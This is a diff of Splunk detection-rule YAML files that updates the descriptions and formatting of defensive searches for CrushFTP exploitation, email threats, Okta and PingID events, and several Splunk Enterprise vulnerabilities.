how_to_implement: CrushFTP Session logs, from Windows or Linux, must be ingested to Splunk. Currently, there is no TA for CrushFTP, so the data must be extracted from the raw logs.
known_false_positives: False positives should be limited, however tune or filter as needed.
references:
- https://github.com/airbus-cert/CVE-2024-4040
- https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
tags:
analytic_story:
- CrushFTP Vulnerabilities
asset_type: Web Application
confidence: 80
impact: 80
message: Potential exploitation of CrushFTP Server Side Template Injection Vulnerability on $dest$ by $src_ip$.
mitre_attack_id:
- T1192
observable:
- name: dest
type: IP Address
role:
- Victim
- name: src_ip
type: IP Address
role:
- Attacker
product:
- Splunk Enterprise
- Splunk Enterprise Security
- Splunk Cloud
required_fields:
- _time
- dest
- source
- src_ip
- http_method
- uri_query
- user
- action
- message
risk_score: 64
security_domain: network
cve:
- CVE-2024-4040
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1190/crushftp/crushftp.log
sourcetype: crushftp:sessionlogs
source: crushftp
@@ -1,13 +1,17 @@
name: Detect New Login Attempts to Routers
id: bce3ed7c-9b1f-42a0-abdf-d8b123a34836
version: 1
date: '2017-09-12'
version: 2
date: '2024-05-14'
author: Bhavin Patel, Splunk
status: experimental
type: TTP
description: The search queries the authentication logs for assets that are categorized
as routers in the ES Assets and Identity Framework, to identify connections that
have not been seen before in the last 30 days.
description: The following analytic identifies new login attempts to routers. It leverages
authentication logs from the ES Assets and Identity Framework, focusing on assets
categorized as routers. The detection flags connections that have not been observed
in the past 30 days. This activity is significant because unauthorized access to
routers can lead to network disruptions or data interception. If confirmed malicious,
attackers could gain control over network traffic, potentially leading to data breaches
or further network compromise.
data_source: []
search: '| tstats `security_content_summariesonly` count earliest(_time) as earliest
latest(_time) as latest from datamodel=Authentication where Authentication.dest_category=router
@@ -1,13 +1,18 @@
name: Email Attachments With Lots Of Spaces
id: 56e877a6-1455-4479-ada6-0550dc1e22f8
version: 2
date: '2023-04-14'
version: 3
date: '2024-05-16'
author: David Dorsey, Splunk
status: experimental
type: Anomaly
description: Attackers often use spaces as a means to obfuscate an attachment's file
extension. This search looks for messages with email attachments that have many
spaces within the file names.
description: The following analytic detects email attachments with an unusually high
number of spaces in their file names, which is a common tactic used by attackers
to obfuscate file extensions. It leverages the Email data model to identify attachments
where the ratio of spaces to the total file name length exceeds 10%. This behavior
is significant as it may indicate an attempt to bypass security filters and deliver
malicious payloads. If confirmed malicious, this activity could lead to the execution
of harmful code or unauthorized access to sensitive information within the recipient's
environment.
data_source: []
search: '| tstats `security_content_summariesonly` count values(All_Email.recipient)
as recipient_address min(_time) as firstTime max(_time) as lastTime from datamodel=Email
@@ -16,12 +21,12 @@ search: '| tstats `security_content_summariesonly` count values(All_Email.recipi
| eval space_ratio = (mvcount(split(file_name," "))-1)/len(file_name) | search space_ratio
>= 0.1 | rex field=recipient_address "(?<recipient_user>.*)@" | `email_attachments_with_lots_of_spaces_filter`'
how_to_implement: 'You need to ingest data from emails. Specifically, the sender''s
address and the file names of any attachments must be mapped to the Email data
model. The threshold ratio is set to 10%, but this value can be configured to
suit each environment.
address and the file names of any attachments must be mapped to the Email data model.
The threshold ratio is set to 10%, but this value can be configured to suit each
environment.
**Splunk Phantom Playbook Integration**
If Splunk Phantom is also configured in your environment, a playbook called "Suspicious
Email Attachment Investigate and Delete" can be configured to run when any results
are found by this detection search. To use this integration, install the Phantom
@@ -1,12 +1,18 @@
name: Email files written outside of the Outlook directory
id: 8d52cf03-ba25-4101-aa78-07994aed4f74
version: 3
date: '2020-07-21'
version: 4
date: '2024-05-15'
author: Bhavin Patel, Splunk
status: experimental
type: TTP
description: The search looks at the change-analysis data model and detects email
files created outside the normal Outlook directory.
description: The following analytic detects email files (.pst or .ost) being created
outside the standard Outlook directories. It leverages the Endpoint.Filesystem data
model to identify file creation events and filters for email files not located in
"C:\Users\*\My Documents\Outlook Files\*" or "C:\Users\*\AppData\Local\Microsoft\Outlook*".
This activity is significant as it may indicate data exfiltration or unauthorized
access to email data. If confirmed malicious, an attacker could potentially access
sensitive email content, leading to data breaches or further exploitation within
the network.
data_source:
- Sysmon Event ID 11
search: '| tstats `security_content_summariesonly` count values(Filesystem.file_path)
@@ -1,13 +1,17 @@
name: Email servers sending high volume traffic to hosts
id: 7f5fb3e1-4209-4914-90db-0ec21b556378
version: 2
date: '2020-07-21'
version: 3
date: '2024-05-18'
author: Bhavin Patel, Splunk
status: experimental
type: Anomaly
description: This search looks for an increase of data transfers from your email server
to your clients. This could be indicative of a malicious actor collecting data using
your email server.
description: The following analytic identifies a significant increase in data transfers
from your email server to client hosts. It leverages the Network_Traffic data model
to monitor outbound traffic from email servers, using statistical analysis to detect
anomalies based on average and standard deviation metrics. This activity is significant
as it may indicate a malicious actor exfiltrating data via your email server. If
confirmed malicious, this could lead to unauthorized data access and potential data
breaches, compromising sensitive information and impacting organizational security.
data_source: []
search: '| tstats `security_content_summariesonly` sum(All_Traffic.bytes_out) as bytes_out
from datamodel=Network_Traffic where All_Traffic.src_category=email_server by All_Traffic.dest_ip
@@ -1,12 +1,17 @@
name: Monitor Email For Brand Abuse
id: b2ea1f38-3a3e-4b8a-9cf1-82760d86a6b8
version: 2
date: '2018-01-05'
version: 3
date: '2024-04-16'
author: David Dorsey, Splunk
status: experimental
type: TTP
description: This search looks for emails claiming to be sent from a domain similar
to one that you want to have monitored for abuse.
description: The following analytic identifies emails claiming to be sent from a domain
similar to one you are monitoring for potential abuse. It leverages email header
data, specifically the sender's address, and cross-references it with a lookup table
of known domain permutations generated by the "ESCU - DNSTwist Domain Names" search.
This activity is significant as it can indicate phishing attempts or brand impersonation,
which are common tactics used in social engineering attacks. If confirmed malicious,
this could lead to unauthorized access, data theft, or reputational damage.
data_source: []
search: '| tstats `security_content_summariesonly` values(All_Email.recipient) as
recipients, min(_time) as firstTime, max(_time) as lastTime from datamodel=Email
@@ -1,20 +1,30 @@
name: Okta Suspicious Activity Reported
id: bfc840f5-c9c6-454c-aa13-b46fd0bf1e79
version: 2
date: '2022-09-21'
version: 3
date: '2024-05-13'
author: Michael Haag, Splunk
status: production
type: TTP
description: This event is generated when an associate receives an email from Okta inquiring whether a login attempt was suspicious. If the associate deems it suspicious, an event is generated for review.
description: The following analytic identifies when an associate reports a login attempt
as suspicious via an email from Okta. It leverages Okta Identity Management logs,
specifically the `user.account.report_suspicious_activity_by_enduser` event type.
This activity is significant as it indicates potential unauthorized access attempts,
warranting immediate investigation to prevent possible security breaches. If confirmed
malicious, the attacker could gain unauthorized access to sensitive systems and
data, leading to data theft, privilege escalation, or further compromise of the
environment.
data_source: []
search: '`okta` eventType=user.account.report_suspicious_activity_by_enduser
| stats count min(_time) as firstTime max(_time) as lastTime values(displayMessage) by user eventType client.userAgent.rawUserAgent client.userAgent.browser client.geographicalContext.city client.geographicalContext.country
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `okta_suspicious_activity_reported_filter`'
how_to_implement: This detection utilizes logs from Okta Identity Management (IM) environments. It requires the ingestion of OktaIm2 logs through the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). Additionally, it necessitates the activation of suspicious activity reporting and training for associates to report such activities.
known_false_positives: False positives should be minimal, given the high fidelity of this detection.
marker.
search: '`okta` eventType=user.account.report_suspicious_activity_by_enduser | stats
count min(_time) as firstTime max(_time) as lastTime values(displayMessage) by user
eventType client.userAgent.rawUserAgent client.userAgent.browser client.geographicalContext.city client.geographicalContext.country
| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_suspicious_activity_reported_filter`'
how_to_implement: This detection utilizes logs from Okta Identity Management (IM)
environments. It requires the ingestion of OktaIm2 logs through the Splunk Add-on
for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). Additionally,
it necessitates the activation of suspicious activity reporting and training for
associates to report such activities.
known_false_positives: False positives should be minimal, given the high fidelity
of this detection. marker.
references:
- https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm
tags:
@@ -23,7 +33,8 @@ tags:
asset_type: Okta Tenant
confidence: 50
impact: 50
message: A user [$user$] reported suspicious activity in Okta. Investigate further to determine if this was authorized.
message: A user [$user$] reported suspicious activity in Okta. Investigate further
to determine if this was authorized.
mitre_attack_id:
- T1078
- T1078.001
@@ -50,6 +61,7 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1078/okta_suspicious_activity_reported_by_user/okta_suspicious_activity_reported_by_user.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1078/okta_suspicious_activity_reported_by_user/okta_suspicious_activity_reported_by_user.log
source: Okta
sourcetype: OktaIM2:log
sourcetype: OktaIM2:log
@@ -1,25 +1,35 @@
name: PingID New MFA Method Registered For User
id: 892dfeaf-461d-4a78-aac8-b07e185c9bce
version: 1
date: '2023-09-26'
version: 2
date: '2024-05-07'
author: Steven Dick
status: production
type: TTP
description: The following analytic identifies the registration of a new Multi Factor authentication method for a PingID (PingOne) account. Adversaries who have obtained unauthorized access to a user account may register a new MFA method to maintain persistence.
description: The following analytic detects the registration of a new Multi-Factor
Authentication (MFA) method for a PingID (PingOne) account. It leverages JSON logs
from PingID, specifically looking for successful device pairing events. This activity
is significant as adversaries who gain unauthorized access to a user account may
register a new MFA method to maintain persistence. If confirmed malicious, this
could allow attackers to bypass existing security measures, maintain long-term access,
and potentially escalate their privileges within the compromised environment.
data_source:
- PingID
search: >-
`pingid` "result.message"="Device Paired*" result.status="SUCCESS"
| rex field=result.message "Device (Unp)?(P)?aired (?<device_extract>.+)"
| eval src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user = upper('actors{}.name'), reason = 'result.message'
`pingid` "result.message"="Device Paired*" result.status="SUCCESS" | rex field=result.message
"Device (Unp)?(P)?aired (?<device_extract>.+)"
| eval src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user =
upper('actors{}.name'), reason = 'result.message'
| eval object=CASE(ISNOTNULL('resources{}.devicemodel'),'resources{}.devicemodel',true(),device_extract)
| eval action=CASE(match('result.message',"Device Paired*"),"created",match('result.message', "Device Unpaired*"),"deleted")
| eval action=CASE(match('result.message',"Device Paired*"),"created",match('result.message',
"Device Unpaired*"),"deleted")
| stats count min(_time) as firstTime, max(_time) as lastTime by src,user,object,action,reason
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `pingid_new_mfa_method_registered_for_user_filter`
how_to_implement: Target environment must ingest JSON logging from a PingID(PingOne) enterprise environment, either via Webhook or Push Subscription.
known_false_positives: False positives may be generated by normal provisioning workflows for user device registration.
how_to_implement: Target environment must ingest JSON logging from a PingID(PingOne)
enterprise environment, either via Webhook or Push Subscription.
known_false_positives: False positives may be generated by normal provisioning workflows
for user device registration.
references:
- https://twitter.com/jhencinski/status/1618660062352007174
- https://attack.mitre.org/techniques/T1098/005/
@@ -31,11 +41,12 @@ tags:
asset_type: Identity
confidence: 50
impact: 20
message: An MFA configuration change was detected for [$user$], the device [$object$] was $action$.
message: An MFA configuration change was detected for [$user$], the device [$object$]
was $action$.
mitre_attack_id:
- T1621
- T1556.006
- T1098.005
- T1098.005
observable:
- name: user
type: User
@@ -65,7 +76,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1621/pingid/pingid.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1621/pingid/pingid.log
source: PINGID
sourcetype: _json
update_timestamp: true
update_timestamp: true
@@ -1,16 +1,23 @@
name: Splunk Absolute Path Traversal Using runshellscript
id: 356bd3fe-f59b-4f64-baa1-51495411b7ad
version: 1
date: '2023-09-05'
version: 2
date: '2024-05-17'
author: Rod Soto
status: production
type: Hunting
data_source:
data_source:
- Splunk
description: In Splunk Enterprise versions lower than 8.2.12, 9.0.6, and 9.1.1, an attacker can exploit an absolute path traversal to execute arbitrary code that is located on a separate disk.
search: >-
`splunk_python` *runshellscript*
| eval log_split=split(_raw, "runshellscript: ")
description: The following analytic detects the exploitation of an absolute path traversal
vulnerability in Splunk Enterprise versions lower than 8.2.12, 9.0.6, and 9.1.1,
where an attacker can execute arbitrary code located on a separate disk. It leverages
logs from the `splunk_python` macro, specifically looking for the `runshellscript`
command with a specific argument count and path pattern. This activity is significant
as it indicates a potential exploitation attempt that could lead to unauthorized
code execution. If confirmed malicious, this could allow an attacker to gain control
over the Splunk instance, leading to data breaches or further system compromise.
search: >-
`splunk_python` *runshellscript* | eval log_split=split(_raw, "runshellscript:
")
| eval array_raw = mvindex(log_split,1)
| eval data_cleaned=replace(replace(replace(array_raw,"\[",""),"\]",""),"'","")
| eval array_indices=split(data_cleaned,",")
@@ -19,20 +26,25 @@ search: >-
| eval interpreter=mvindex(array_indices,0)
| eval targetScript=mvindex(array_indices,1)
| eval targetScript != "*C:*"
| stats count min(_time) as firstTime max(_time) as lastTime by splunk_server interpreter targetScript
| stats count min(_time) as firstTime max(_time) as lastTime by splunk_server interpreter
targetScript
| `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`
| `splunk_absolute_path_traversal_using_runshellscript_filter`
how_to_implement: Must have access to internal indexes. Only applies to Splunk on Windows versions.
known_false_positives: The command runshellscript can be used for benign purposes. Analyst will have to review the searches and determined maliciousness specially by looking at targeted script.
how_to_implement: Must have access to internal indexes. Only applies to Splunk on
Windows versions.
known_false_positives: The command runshellscript can be used for benign purposes.
Analyst will have to review the searches and determined maliciousness specially
by looking at targeted script.
references:
- https://advisory.splunk.com/advisories/SVD-2023-0806
tags:
analytic_story:
- Splunk Vulnerabilities
- Splunk Vulnerabilities
asset_type: Endpoint
confidence: 70
impact: 50
message: Possible attack against splunk_server $splunk_server$ through abuse of the runshellscript command
message: Possible attack against splunk_server $splunk_server$ through abuse of
the runshellscript command
mitre_attack_id:
- T1083
cve:
@@ -53,7 +65,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1083/splunk/splunk_absolute_path_traversal_using_runshellscript_splunk_python.log
source: python.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1083/splunk/splunk_absolute_path_traversal_using_runshellscript_splunk_python.log
source: python.log
sourcetype: splunk_python
custom_index: _internal
custom_index: _internal
@@ -1,54 +1,62 @@
name: Splunk App for Lookup File Editing RCE via User XSLT
id: a053e6a6-2146-483a-9798-2d43652f3299
version: 1
date: '2023-11-16'
version: 2
date: '2024-05-16'
author: Rod Soto, Splunk
status: experimental
type: Hunting
data_source: []
description: This search provides information to investigate possible remote code execution exploitation via
user-supplied Extensible Stylesheet Language Transformations (XSLT), affecting Splunk versions 9.1.x.
search: '| rest splunk_server=local /services/data/lookup-table-files/
| fields title author disabled eai:acl.app eai:acl.owner eai:acl.sharing eai:appName eai:data
| `splunk_app_for_lookup_file_editing_rce_via_user_xslt_filter`'
how_to_implement: Because there is no way to detect the payload, this search only provides the ability to monitor
the creation of lookups which are the base of this exploit. An operator must then investigate suspicious lookups.
This search requires ability to perform REST queries. Note that if the Splunk App for Lookup File Editing is not,
or was not, installed in the Splunk environment then it is not necessary to run the search as the enviornment
was not vulnerable.
known_false_positives: This search will provide information for investigation and hunting of lookup creation via
user-supplied XSLT which may be indications of possible exploitation. There will be false positives as it is
not possible to detect the payload executed via this exploit.
description: The following analytic identifies the creation of lookup files in Splunk,
which could indicate an attempt to exploit remote code execution via user-supplied
XSLT. It leverages REST API queries to monitor the creation of these lookups, focusing
on fields such as title, author, and access control lists. This activity is significant
because it targets a known vulnerability in Splunk versions 9.1.x, potentially allowing
attackers to execute arbitrary code. If confirmed malicious, this could lead to
unauthorized code execution, compromising the integrity and security of the Splunk
environment.
search: '| rest splunk_server=local /services/data/lookup-table-files/ | fields title
author disabled eai:acl.app eai:acl.owner eai:acl.sharing eai:appName eai:data |
`splunk_app_for_lookup_file_editing_rce_via_user_xslt_filter`'
how_to_implement: Because there is no way to detect the payload, this search only
provides the ability to monitor the creation of lookups which are the base of this
exploit. An operator must then investigate suspicious lookups. This search requires
ability to perform REST queries. Note that if the Splunk App for Lookup File Editing
is not, or was not, installed in the Splunk environment then it is not necessary
to run the search as the enviornment was not vulnerable.
known_false_positives: This search will provide information for investigation and
hunting of lookup creation via user-supplied XSLT which may be indications of possible
exploitation. There will be false positives as it is not possible to detect the
payload executed via this exploit.
references:
- https://advisory.splunk.com/advisories/SVD-2023-1104
cve:
- CVE-2023-46214
- https://advisory.splunk.com/advisories/SVD-2023-1104
cve:
- CVE-2023-46214
tags:
analytic_story:
- Splunk Vulnerabilities
- Splunk Vulnerabilities
asset_type: Endpoint
confidence: 2
impact: 50
message: Please review $eai:acl.app$ for possible malicious lookups
mitre_attack_id:
- T1210
- T1210
observable:
- name: eai:acl.app
type: Other
role:
- Victim
- name: eai:acl.app
type: Other
role:
- Victim
product:
- Splunk Enterprise
- Splunk Enterprise Security
- Splunk Cloud
- Splunk Enterprise
- Splunk Enterprise Security
- Splunk Cloud
risk_score: 1
required_fields:
- title
- author
- disabled
- ea:acl.app
- eai:acl.owner
- eai:acl.sharing
- eai:appName
- eai:data
- title
- author
- disabled
- ea:acl.app
- eai:acl.owner
- eai:acl.sharing
- eai:appName
- eai:data
security_domain: endpoint
@@ -1,16 +1,25 @@
name: Splunk DOS Via Dump SPL Command
id: fb0e6823-365f-48ed-b09e-272ac4c1dad6
version: 1
date: '2023-05-10'
version: 2
date: '2024-05-03'
author: Rod Soto
status: production
type: Hunting
data_source:
- Splunk
description: In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, an attacker can exploit a vulnerability in the dump SPL command to cause a Denial of Service by crashing the Splunk daemon.
description: The following analytic identifies a potential Denial of Service (DoS)
attack exploiting the dump SPL command in vulnerable Splunk Enterprise versions.
It detects this activity by searching the `splunk_crash_log` for segmentation fault
entries, indicating a crash of the Splunk daemon. This activity is significant for
a SOC because it can disrupt the availability of Splunk services, impacting monitoring
and incident response capabilities. If confirmed malicious, this attack could render
Splunk Enterprise unusable, severely hindering an organization's ability to detect
and respond to other security threats.
search: '`splunk_crash_log` "*Segmentation fault*" | stats count by host _time | `splunk_dos_via_dump_spl_command_filter`'
how_to_implement: This search does not require additional ingestion of data. Requires the ability to search _internal index and monitor segmentation faults.
known_false_positives: Segmentation faults may occur due to other causes, so this search may produce false positives
how_to_implement: This search does not require additional ingestion of data. Requires
the ability to search _internal index and monitor segmentation faults.
known_false_positives: Segmentation faults may occur due to other causes, so this
search may produce false positives
references:
- https://advisory.splunk.com/
tags:
@@ -32,8 +41,8 @@ tags:
- Splunk Enterprise
risk_score: 100
required_fields:
- host
- source
- host
- source
- event_message
- status
- _time
@@ -41,7 +50,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1499.004/splunk/splunk_dos_via_dump_spl_command.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1499.004/splunk/splunk_dos_via_dump_spl_command.log
source: /opt/splunk/var/log/splunk/splunkd.log
sourcetype: splunkd_crash_log
custom_index: _internal
custom_index: _internal
@@ -1,28 +1,42 @@
name: Splunk Edit User Privilege Escalation
id: 39e1c326-67d7-4c0d-8584-8056354f6593
version: 1
date: '2023-05-23'
version: 2
date: '2024-05-15'
author: Rod Soto, Chase Franklin
status: production
type: Hunting
data_source:
- Splunk
description: A low-privilege user who holds a role that has the edit_user capability assigned to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
search: '`audittrail` action IN ("change_own_password","password_change","edit_password") AND info="granted" AND NOT user IN (admin, splunk-system-user) | stats earliest(_time) as event_time values(index) as index values(sourcetype) as sourcetype values(action) as action values(info) as info by user | `splunk_edit_user_privilege_escalation_filter`'
how_to_implement: This detection does not require you to ingest any new data. The detection does require the ability to search the _audit index. This detection may assist in efforts to discover abuse of edit_user privilege.
known_false_positives: This search may produce false positives as password changing actions may be part of normal behavior. Operator will need to investigate these actions in order to discern exploitation attempts.
description: The following analytic identifies attempts by low-privilege users to
escalate their privileges to admin by exploiting the edit_user capability. It detects
this activity by analyzing audit trail logs for specific actions such as "change_own_password"
and "edit_password" where the info field is "granted" and the user is not an admin
or system user. This activity is significant because it indicates potential privilege
escalation, which is a critical security concern. If confirmed malicious, this could
allow an attacker to gain administrative access, leading to full control over the
Splunk environment and potential data breaches.
search: '`audittrail` action IN ("change_own_password","password_change","edit_password")
AND info="granted" AND NOT user IN (admin, splunk-system-user) | stats earliest(_time)
as event_time values(index) as index values(sourcetype) as sourcetype values(action)
as action values(info) as info by user | `splunk_edit_user_privilege_escalation_filter`'
how_to_implement: This detection does not require you to ingest any new data. The
detection does require the ability to search the _audit index. This detection may
assist in efforts to discover abuse of edit_user privilege.
known_false_positives: This search may produce false positives as password changing
actions may be part of normal behavior. Operator will need to investigate these
actions in order to discern exploitation attempts.
references:
- https://advisory.splunk.com/
- https://advisory.splunk.com/
tags:
analytic_story:
- Splunk Vulnerabilities
- Splunk Vulnerabilities
asset_type: Endpoint
atomic_guid: []
confidence: 80
impact: 80
cve:
- CVE-2023-32707
message: Possible attempt to abuse edit_user function by $user$
message: Possible attempt to abuse edit_user function by $user$
mitre_attack_id:
- T1548
observable:
@@ -36,15 +50,16 @@ tags:
- Splunk Cloud
risk_score: 64
required_fields:
- user
- action
- info
- _time
- user
- action
- info
- _time
security_domain: endpoint
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1548/splunk/splunk_edit_user_privilege_escalation.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1548/splunk/splunk_edit_user_privilege_escalation.log
source: audittrail
sourcetype: audittrail
custom_index: _audit
@@ -1,22 +1,30 @@
name: Splunk Enterprise Windows Deserialization File Partition
id: 947d4d2e-1b64-41fc-b32a-736ddb88ce97
version: 1
date: '2024-01-18'
version: 2
date: '2024-05-18'
author: Rod Soto, Eric McGinnis, Chase Franklin
status: production
type: TTP
data_source:
data_source:
- Splunk
description: In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data resulting in the unsafe deserialization of untrusted data. This vulnerability only affects Splunk Enterprise for Windows.
search: '`splunk_python` request_path="/en-US/app/search/C:\\Program" *strings*
| rex "request_path=(?<file_path>[^\"]+)"
| rex field=file_path "[^\"]+/(?<file_name>[^\"\''\s/\\\\]+)"
| stats min(_time) as firstTime max(_time) as lastTime values(file_path) as file_path values(file_name) as file_name by index, sourcetype, host
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `splunk_enterprise_windows_deserialization_file_partition_filter`'
how_to_implement: Requires access to internal indexes. This detection search will display irregular path file execution, which will display exploit attempts. Only applies to Microsoft Windows Splunk versions.
known_false_positives: Irregular path with files that may be purposely called for benign reasons may produce false positives.
description: The following analytic identifies attempts to exploit a deserialization
vulnerability in Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3. It
detects irregular path file executions by analyzing `splunk_python` logs and extracting
file paths and names. This activity is significant because it indicates potential
exploitation of a known vulnerability, which could lead to arbitrary code execution.
If confirmed malicious, an attacker could gain unauthorized access, execute arbitrary
code, and potentially compromise the entire Splunk environment, leading to data
breaches and further system exploitation.
search: '`splunk_python` request_path="/en-US/app/search/C:\\Program" *strings* |
rex "request_path=(?<file_path>[^\"]+)" | rex field=file_path "[^\"]+/(?<file_name>[^\"\''\s/\\\\]+)"
| stats min(_time) as firstTime max(_time) as lastTime values(file_path) as file_path
values(file_name) as file_name by index, sourcetype, host | `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)` | `splunk_enterprise_windows_deserialization_file_partition_filter`'
how_to_implement: Requires access to internal indexes. This detection search will
display irregular path file execution, which will display exploit attempts. Only
applies to Microsoft Windows Splunk versions.
known_false_positives: Irregular path with files that may be purposely called for
benign reasons may produce false positives.
references:
- https://advisory.splunk.com/advisories/SVD-2024-0108
tags:
@@ -25,7 +33,8 @@ tags:
asset_type: Splunk Server
confidence: 90
impact: 100
message: Possible Windows Deserialization exploitation via irregular path file against $host$
message: Possible Windows Deserialization exploitation via irregular path file against
$host$
mitre_attack_id:
- T1190
cve:
@@ -40,14 +49,15 @@ tags:
risk_score: 90
required_fields:
- request_path
- field
- file_name
- field
- file_name
- host
security_domain: endpoint
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1190/splunk/splunk_enterprise_windows_deserialization_file_partition_splunk_python.log
source: C:\Program File\Splunk\var\log\splunk\python.log
sourcetype: splunk_python
custom_index: _internal
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1190/splunk/splunk_enterprise_windows_deserialization_file_partition_splunk_python.log
source: C:\Program File\Splunk\var\log\splunk\python.log
sourcetype: splunk_python
custom_index: _internal
@@ -1,20 +1,26 @@
name: Splunk Improperly Formatted Parameter Crashes splunkd
id: 08978eca-caff-44c1-84dc-53f17def4e14
version: 1
date: '2023-02-14'
version: 2
date: '2024-05-14'
author: Chase Franklin, Rod Soto, Splunk
status: experimental
type: TTP
description: In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, when the
INGEST\\_EVAL parameter is improperly formatted, it crashes splunkd. This hunting
search provides the user, timing and number of times the crashing command was executed.
description: The following analytic detects the execution of improperly formatted
INGEST_EVAL parameters in Splunk Enterprise, which can crash the splunkd service.
It leverages the Splunk_Audit.Search_Activity datamodel to identify ad-hoc searches
containing specific keywords. This activity is significant because it can disrupt
Splunk operations, leading to potential data loss and service downtime. If confirmed
malicious, an attacker could exploit this to cause a denial of service, impacting
the availability and reliability of the Splunk environment.
data_source: []
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime
from datamodel=Splunk_Audit.Search_Activity
where (Search_Activity.search="*makeresults*"AND Search_Activity.search="*ingestpreview*transforms*") Search_Activity.search_type=adhoc Search_Activity.search!="*splunk_improperly_formatted_parameter_crashes_splunkd_filter*" Search_Activity.user!=splunk-system-user
by Search_Activity.search, Search_Activity.info, Search_Activity.total_run_time, Search_Activity.user, Search_Activity.search_type
| `drop_dm_object_name(Search_Activity)` | `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)` | `splunk_improperly_formatted_parameter_crashes_splunkd_filter`'
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Splunk_Audit.Search_Activity where (Search_Activity.search="*makeresults*"AND
Search_Activity.search="*ingestpreview*transforms*") Search_Activity.search_type=adhoc
Search_Activity.search!="*splunk_improperly_formatted_parameter_crashes_splunkd_filter*"
Search_Activity.user!=splunk-system-user by Search_Activity.search, Search_Activity.info,
Search_Activity.total_run_time, Search_Activity.user, Search_Activity.search_type
| `drop_dm_object_name(Search_Activity)` | `security_content_ctime(firstTime)` |
`security_content_ctime(lastTime)` | `splunk_improperly_formatted_parameter_crashes_splunkd_filter`'
how_to_implement: Requires access to audittrail and use of Splunk_Audit.Search_Activity
datamodel.
known_false_positives: This is a hunting search it should be focused on affected products,
@@ -1,27 +1,40 @@
name: Splunk Information Disclosure in Splunk Add-on Builder
id: b7b82980-4a3e-412e-8661-4531d8758735
version: 1
date: '2024-01-30'
version: 2
date: '2024-05-20'
author: Rod Soto, Eric McGinnis
status: production
type: Hunting
data_source:
data_source:
- Splunk
description: In Splunk Add-on Builder versions below 4.1.4, the application writes sensitive information to its internal log files when you visit the Splunk Add-on Builder or when you build or edit a custom app or add-on.
search: '| rest /services/apps/local | search disabled=0 core=0 label="Splunk Add-on Builder" | dedup label | search version < 4.1.4
| eval WarningMessage="Splunk Add-on Builder Versions older than v4.1.4 contain a critical vulnerability. Update to Splunk Add-on Builder v4.1.4 or higher immediately. For more information about this vulnerability, please refer to https://advisory.splunk.com/advisories/SVD-2024-0111"
| table label version WarningMessage | `splunk_information_disclosure_in_splunk_add_on_builder_filter`'
how_to_implement: This search should be run on search heads where Splunk Add-on Builder may be installed. The results of this search will conclusively show whether or not a vulnerable version of Splunk Add-on Builder is currently installed.
known_false_positives: This search is highly specific for vulnerable versions of Splunk Add-on Builder. There are no known false positives.
description: The following analytic identifies the presence of vulnerable versions
of Splunk Add-on Builder (below 4.1.4) that write sensitive information to internal
log files. It uses REST API queries to check installed app versions and flags those
below the secure threshold. This activity is significant because it exposes sensitive
data, which could be exploited by attackers. If confirmed malicious, this vulnerability
could lead to unauthorized access to sensitive information, compromising the security
and integrity of the Splunk environment. Immediate updates to version 4.1.4 or higher
are recommended.
search: '| rest /services/apps/local | search disabled=0 core=0 label="Splunk Add-on
Builder" | dedup label | search version < 4.1.4 | eval WarningMessage="Splunk Add-on
Builder Versions older than v4.1.4 contain a critical vulnerability. Update to Splunk
Add-on Builder v4.1.4 or higher immediately. For more information about this vulnerability,
please refer to https://advisory.splunk.com/advisories/SVD-2024-0111" | table label
version WarningMessage | `splunk_information_disclosure_in_splunk_add_on_builder_filter`'
how_to_implement: This search should be run on search heads where Splunk Add-on Builder
may be installed. The results of this search will conclusively show whether or
not a vulnerable version of Splunk Add-on Builder is currently installed.
known_false_positives: This search is highly specific for vulnerable versions of Splunk
Add-on Builder. There are no known false positives.
references:
- https://advisory.splunk.com/advisories/SVD-2024-0111
tags:
analytic_story:
- Splunk Vulnerabilities
asset_type: Splunk Server
asset_type: Splunk Server
confidence: 100
impact: 100
